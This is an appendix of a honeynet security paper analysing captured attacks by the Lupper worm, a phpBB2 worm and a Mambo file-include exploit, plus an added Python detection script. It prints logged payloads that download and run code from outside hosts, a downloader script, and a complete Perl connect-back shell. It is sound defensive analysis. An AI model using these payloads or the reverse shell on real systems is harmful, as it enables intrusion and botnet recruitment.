Appendix A - Examples

This section provides some examples from the wild.

The Lupper Worm

The following is an example Apache log entry of an attack by the Lupper worm, against the AWStats command-injection vulnerability:

[24/Dec/2005:13:02:18 +1300] GET
/cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20xx%2eyyy%2ez%2e216%2fnikons%3bchmod%20%2bx%20nikons%3b%2e%2fnikons;echo%20YYY;echo|
HTTP/1.1

(Please note that the IP addresses and domains have been obfuscated throughout this paper.)

Certain versions of the awstats program would execute the code "echo%20YYY;cd%20%2ftmp%3bwget%20192%2e168%2e1%2e216%2fnikons%3bchmod%20%2bx%20nikons%3b%2e%2fnikons;echo%20YYY;" in response to this request. This would cause the file at '192.168.1.216/nikons' to be downloaded and stored in the /tmp directory. It would then be made executable with 'chmod +x nikons' and finally executed.

This file 'nikons' was a shell script which attempted to download two programs: an IRC bot, identified as Tsunami.A, and a variant of the Lupper worm. The Lupper variant tried to spread by scanning for hosts listening on port 80 and attempting to exploit the AWStats and PHPXMLRPC vulnerabilities. (Another Lupper variant is described as trying to exploit a file called hints.pl; this behavior was not present in our captured version.)

#!/bin/bash
cd /tmp
wget 192.168.48.69/d
chmod 744 d
./d
wget 192.168.48.69/qs
chmod 744 qs
./qs

The bash script 'nikons', which downloads and executes two files from a webserver.

The worm probed for the following scripts:

  • /xmlrpc/xmlrpc.php
  • /wordpress/xmlrpc.php
  • /phpgroupware/xmlrpc.php
  • /drupal/xmlrpc.php
  • /blogs/xmlsrv/xmlrpc.php
  • /blog/xmlsrv/xmlrpc.php
  • /blog/xmlrpc.php

If present, any of these scripts would have been exploited via the following PHPXMLRPC exploit. The POST payload below downloads the tool "gicuji", a shell script that downloads and executes the Lupper and Tsunami binaries.

POST /xmlsrv/xmlrpc.php HTTP/1.1 ...
Content-Type: text/xml
Content-Length:269

<?xml version='1.0'?><methodCall><methodName>test.method</methodName><params><param><value><name>',' '));echo '_begin_';echo\ `cd /tmp;wget xxx.yy.zz.144/gicuji;chmod +x gicuji;./gicuji `;echo '_end_';exit;/*</name></value></param></params>\</methodCall>

The PHPBB Worm

This section exhibits example logs created by a worm exploiting a remote code execution vulnerability within phpBB2. The exploit was sent in the value of the "highlight" parameter of the application's viewtopic.php script. Accessing the following URL downloaded the file root.txt from the domain example.com:

/phpBB2/viewtopic.php?p=1277&highlight=%2527.$poster=include($_GET[m]).%2527&m=http://example.com/root.txt?&

The worm checks whether the phpBB installation is vulnerable by fetching the following URL, which attempts to print "jSVowMsd" in the output. If it finds "jSVowMsd" in the requested page, that is, if the vulnerability is present in the application, the targeted PHP server will then run the next two commands.

/phpBB2/viewtopic.php?p=2024&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114) ... chr(34))%252E%2527

The following downloads software from example.com/chobits/linuxday.txt:
/phpBB2/viewtopic.php?p=2024&highlight=%2527%252Esystem(chr(119)%252Echr(103) ... chr(56))%252E%2527

Finally, a bot is downloaded and executed in an attempt to join a botnet:
/phpBB2/viewtopic.php?p=2024&highlight=%2527%252Esystem(chr(119)%252Echr(103)%252Echr(101) ... chr(110)%252Echr(99)%252Echr(97))%252E%2527

Mambo exploit

This section describes an instance of the Mambo exploit observed on our honeynet. The hosts involved in the attack are:

  • 216.63.z.z is the initiator of the exploit
  • 10.0.x.x is the victim
  • 66.98.a.a is the server on which the defacing tool resides
  • 216.99.b.b is the host the first-stage payload resides on
  • 217.160.c.c is the host that the victim connects back to, and
  • 219.96.d.d is the host on which the second-stage payload resides

The following activity was logged by Apache during the attack:

216.63.z.z - - [28/Feb/2006:12:30:44 +1300] GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&
_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://66.98.a.a/cmd.txt?&cmd=cd%20/tmp;wget%20216.99.b.b/cback;chmod%20744%20cback;
./cback%20217.160.c.c%208081;wget%20216.99.b.b/dc.txt...

The GET request is an attempt to exploit a Mambo remote file-include vulnerability to execute http://66.98.a.a/cmd.txt on the victim host. Despite the extension .txt, the URL specifies a PHP script rather than a text file. The vulnerable code in Mambo is as follows:

require_once( "$mosConfig_absolute_path/modules/mod_mainmenu.class.php" );

When the exploit above is used against a vulnerable Mambo installation, the code that is executed is:
require_once( "http://66.98.a.a/cmd.txt?modules/mod_mainmenu.class.php" );

This simply includes the file the attacker wants and ignores the filename after the '?' character. The included code then attempts to execute the operating system commands specified by the cmd= parameter in the original HTTP request. (Successful exploitation of this vulnerability requires the allow_url_fopen configuration directive to be on.) The Philippine Honeynet Project has analysed an incident in which this script 'cmd.txt' appears: "'Defacing Tool 2.0 by r3v3ng4ns' is a suite of PHP-based scripts that allows the attacker to send commands to the server, primarily with the intent to deface web sites." In our experience the script is often used to download further malware using wget/curl, or to test for the presence of vulnerable scripts by attempting commands such as 'id' or 'uname'. It seems that the script can also be uploaded to PHP/Apache servers to provide an easily accessible set of utilities for executing commands and searching for files. This will only be an issue if the web server allows the upload of PHP scripts to the web root. The command that was parsed out is as follows:

cd /tmp; wget 216.99.b.b/cback; chmod 744 cback; ./cback
217.160.c.c 8081; wget 216.99.b.b/dc.txt; chmod 744 dc.txt; perl dc.txt
217.160.c.c 8081;cd /var/tmp; curl -o cback
http://216.99.b.b/cback;chmod 744 cback; ./cback 217.160.c.c 8081; curl
-o dc.txt http://216.99.b.b/dc.txt;chmod 744 dc.txt; perl dc.txt
217.160.c.c 8081;echo YYY;echo|

Five distinct hosts have participated in the attack up to the point that this command is executed:

  • the victim
  • the host that exploited the vulnerability and initiated the download
  • the host that the malware is downloaded from
  • the host that will be connected to on port 8081
  • the host where the "Defacing Tool v2.0" resides
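As an added example (not part of the original paper), the following Python script decodes request lines like those logged above and flags the three techniques this appendix documents: shell command injection through the AWStats configdir parameter, PHP code injection through the phpBB highlight parameter (including chr() obfuscation), and the Mambo remote file inclusion via mosConfig_absolute_path. The sample request lines are constructed from the appendix's obfuscated entries, and the signatures are our own assumptions rather than any product's ruleset.

```python
import re
from urllib.parse import unquote

# Request lines constructed from the appendix's obfuscated log entries
# (sample input, not a real log; the last line is a benign control).
SAMPLES = [
    "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20xx%2eyyy%2ez%2e216"
    "%2fnikons%3bchmod%20%2bx%20nikons%3b%2e%2fnikons;echo%20YYY;echo| HTTP/1.1",
    "GET /phpBB2/viewtopic.php?p=1277&highlight=%2527.$poster=include($_GET[m]).%2527"
    "&m=http://example.com/root.txt?& HTTP/1.1",
    "GET /phpBB2/viewtopic.php?p=2024&highlight=%2527%252Esystem(chr(119)%252Echr(103)"
    "%252Echr(101)%252Echr(116))%252E%2527 HTTP/1.1",
    "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content"
    "&GLOBALS=&mosConfig_absolute_path=http://66.98.a.a/cmd.txt?&cmd=cd%20/tmp;wget%20216.99.b.b/cback HTTP/1.1",
    "GET /phpBB2/viewtopic.php?p=5&highlight=kernel HTTP/1.1",
]

def full_decode(s, rounds=3):
    """URL-decode repeatedly so double encoding (%2527 -> %27 -> ') is unwrapped."""
    for _ in range(rounds):
        d = unquote(s)
        if d == s:
            break
        s = d
    return s

CHR_SEQ = re.compile(r"(?:chr\(\d+\)\s*\.\s*)*chr\(\d+\)")
CHR_ONE = re.compile(r"chr\((\d+)\)")

def decode_chr(s):
    """Replace PHP chr(n).chr(m)... chains with the literal string they build."""
    return CHR_SEQ.sub(lambda m: "".join(chr(int(n)) for n in CHR_ONE.findall(m.group(0))), s)

def decode_request(path):
    """Normalise a request path/query the way an analyst would before reading it."""
    return decode_chr(full_decode(path))

# Assumed signatures for the three techniques seen in this appendix.
RULES = [
    ("cmd-injection", re.compile(r"(?:^|[;|&\s(=])(?:wget|curl|chmod|cd\s+/(?:var/)?tmp)\b")),
    ("php-code-injection", re.compile(r"\b(?:system|include|passthru|exec|shell_exec)\s*\(")),
    ("remote-file-include", re.compile(r"[?&][^=&]+=https?://", re.I)),
]

def analyse(request_line):
    """Return the sorted rule names that fire on one Apache request line ([] if clean)."""
    parts = request_line.split(" ")
    path = parts[1] if len(parts) > 1 and parts[0] in ("GET", "POST") else request_line
    return sorted(name for name, rx in RULES if rx.search(decode_request(path)))

if __name__ == "__main__":
    for line in SAMPLES:
        print(analyse(line), decode_request(line.split(" ")[1])[:70])
```

The decoding step matters more than the signatures: the phpBB payload only reveals "wget" after the double URL encoding and the chr() chain have both been unwrapped.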

The following script is dc.txt, a simple connect-back shell written in Perl:

#!/usr/bin/perl
use Socket;
use FileHandle;
$IP = $ARGV[0];
$PORT = $ARGV[1];
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
connect(SOCKET, sockaddr_in($PORT,inet_aton($IP)));
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
system("id; pwd; uname -a; w; HISTFILE=/dev/null /bin/sh -i");

The behavior of this script was studied on a virtual machine. The script downloaded and executed another Perl program, the IRC bot variant PERL/Shellbot. This joined a particular IRC channel and waited for commands.